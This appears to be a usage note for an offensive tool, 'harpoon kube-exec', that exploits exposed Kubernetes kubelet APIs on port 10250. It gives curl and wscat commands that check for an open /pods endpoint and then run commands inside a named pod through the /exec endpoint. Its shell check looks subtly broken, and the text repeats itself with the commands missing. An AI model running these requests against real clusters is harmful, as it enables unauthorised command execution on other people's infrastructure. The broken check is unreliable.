harpoon kube-exec -h https://<node-ip | node-domain> [-p 10250] [-e command]
If -e is given then if the preliminary checks pass, harpoon will try to exploit the mis-configuration. This attack only works if you can route to the node api. So, you either have to be on the same network, or it happens to be publicly routable.
Check (verify/come up with a better check)
[[ '${curl --insecure "https://<node>:10250/pods" 2>1 | head -c 2}' != '{"' ]] && echo Match
Execute command
curl --insecure -v -H "Upgrade: WebSocket" -H "Connection: Upgrade" -H "X-Stream-Protocol-Version: v2.channel.k8s.io" -H "X-Stream-Protocol-Version: channel.k8s.io" -X POST "https://<node>:10250/exec/default/redis-master-57fc67768d-klfw6/master?command=echo&command=hi&input=1&output=1&tty=1"
Stream results
wscat -c "https://<node>:10250/exec/default/redis-master-57fc67768d-klfw6/master?command=echo&command=hi&input=1&output=1&tty=1" --no-check
harpoon kube-exec -h https://<node-ip | node-domain> [-p 10250] [-e command]
If -e is given then if the preliminary checks pass, harpoon will try to exploit the mis-configuration. This attack only works if you can route to the node api. So, you either have to be on the same network, or it happens to be publicly routable.
Check (verify/come up with a better check)
Execute command
Stream results